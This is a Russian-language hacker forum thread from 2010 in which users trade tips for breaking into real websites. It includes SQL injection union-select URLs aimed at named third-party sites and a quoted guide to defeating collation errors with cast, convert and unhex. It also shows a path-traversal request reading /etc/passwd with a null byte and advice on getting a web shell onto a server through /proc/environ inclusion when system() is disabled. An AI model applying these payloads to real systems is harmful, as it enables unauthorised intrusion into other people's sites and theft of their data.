HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14561  
Старый 30.07.2010, 09:10
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

на античате была статья про инъекцию в LIMITе, но нужно, чтобы перед лимитом не было order by, а в приведенном выше примере он есть.
 
Ответить с цитированием

  #14562  
Старый 30.07.2010, 09:43
xFennyks
Guest
Сообщений: n/a
Провел на форуме:
6647

Репутация: 0
По умолчанию

Как провести инклуд если в скрипте только такой код

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];[/COLOR][/COLOR
А Include нету О_о (((((
 
Ответить с цитированием

  #14563  
Старый 30.07.2010, 12:03
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
Code:
Как провести инклуд
А Include нету О_о
Эээээх
 
Ответить с цитированием

  #14564  
Старый 30.07.2010, 15:57
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
клац
Учимся юзать поиск на форуме..Джокестер в свое время создавал данную тему именно для того что бы в вопросах не было простых вопросов... и кстати отличное пособие для начинающих...надо запретить доступ новичков в ''Ваши вопросы по уязвимостям.''...задолбали уже...охренеть вопрос про кодировку
Не умничай Перепробовал все что возможно, CONVERT(Version(),binary) и т.д. всеравно ошибка, когда в запросе присутствуют скобки...

Вот короче эта скуля - http://www.bikeland.ru/rus/catalog/?action=assortment&id=-95+union+select+1+--+
 
Ответить с цитированием

  #14565  
Старый 30.07.2010, 16:14
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от ZARO  
ZARO said:
Не умничай
Перепробовал все что возможно,
CONVERT(Version(),binary)
и т.д. всеравно ошибка, когда в запросе присутствуют скобки...
Вот короче эта скуля -
http://www.bikeland.ru/rus/catalog/?action=assortment&id=-95+union+select+1+--+
а причем тут кодировка я не понял? скобки и кодировка?никто не умничает...просто ты думай перед тем как бред и чушь всякую постить



для тех кто в танке


''Вопрос №2 Вот так выводит , а вот так невыводит.

site.com/index.php?id=1+union+select+1,2,3,4/*------------выводит

site.com/index.php?id=1+union+select+1,version(),3,4/*----невыводит

Господа, вывод у скули либо есть, либо нет, и если вы видите вывод цифры, но не видите версию или значние из столбца, то варианта 2 либо кодировка, либо тип данных не соответствует

Кодировка:

Может сопровождаться ошибкой такого плана:

Код:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT)

Бороться с этим можно несколькими способами, но все они сводятся к одному и тому-же. Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:

cast(Version()+as+binary)

CONVERT(Version(),binary)

convert(version()+using+latin1)

convert(version()+using+binary)

Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке

aes_decrypt(aes_encrypt(Version(),1),1)

unhex(hex(version()))

пример, можете поэксперементировать с разными функциями:

http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,cast(version()+as+binary),3,4,5,6 ,7,8,9,10,11,12,13,14+from+information_schema.tabl es--

Несоответствие типа данных вам может встретится на БД отличных от MySql. MySql относится к типам данных достаточно лояльно, а вот другие БД в основном несоответствия не терпят. Если ваша база оказалась именно такой нужно ознакомится со статьями по проведению инъекций в Вашей базе. '' by Jokester

теперь еще раз повторюсь..причем вообще скобки с кодировкой?

можеш; попробовать в жопе пальцем ковырнутся что бы золото добыть, если ничего не получится это не значит что из за того что палец кривой...чуешь?
 
Ответить с цитированием

  #14566  
Старый 31.07.2010, 00:17
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Есть сайт, крутится на apache2 tomcat

Есть уязвимость, заключается в скачивании любых файлов сервака, типа:

Цитата:
Сообщение от None  
http://www.site.com/image?file=/../../../../../../../../../../../etc/passwd%00.html
Стоит на серваке Jboss, но какая база не ясно, файл etc/mysql/my.cnf прочитал, вот его содержимое:

Код:
Code:
[mysqld_safe] socket		= /var/run/mysqld/mysqld.sock nice		= 0  [mysqld] # # * Basic Settings # user		= mysql pid-file	= /var/run/mysqld/mysqld.pid socket		= /var/run/mysqld/mysqld.sock port		= 3306 basedir		= /usr datadir		= /var/lib/mysql tmpdir		= /tmp language	= /usr/share/mysql/english skip-external-locking
!includedir /etc/mysql/conf.d/
логи не ведутся.

Вопрос, куда можно покопать и узнать какой может быть движок базы и как можно узнать есть ли что-то в mysql?
 
Ответить с цитированием

  #14567  
Старый 31.07.2010, 02:41
Dedicat_sell
Guest
Сообщений: n/a
Провел на форуме:
1623

Репутация: 0
По умолчанию

немогу проинклудить useragent

system() и passthru() has been disabled for security reasons in /proc/19925/environ

Как можно обойти это и залить шелл
 
Ответить с цитированием

  #14568  
Старый 31.07.2010, 14:31
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Dedicat_sell  
Dedicat_sell said:
немогу проинклудить useragent
system() и passthru() has been disabled for security reasons in /proc/19925/environ
Как можно обойти это и залить шелл
eval(), copy(), любые другие функции заюзай.
 
Ответить с цитированием

  #14569  
Старый 31.07.2010, 14:50
Dedicat_sell
Guest
Сообщений: n/a
Провел на форуме:
1623

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
eval(), copy(), любые другие функции заюзай.
Да я все функции перебрал eval(), copy(), system(), passthru(), exec(), может есть скрипт который обходит это дело?
 
Ответить с цитированием

  #14570  
Старый 31.07.2010, 17:18
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Dedicat_sell  
Dedicat_sell said:
Да я все функции перебрал eval(), copy(), system(), passthru(), exec(), может есть скрипт который обходит это дело?
Что, не работают эти функции? Тогда сложновато будет с заливкой шелльца, а даже если зальешь, то все равно трудно будет в управлении - права то обрезаны по самое не балуйся.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ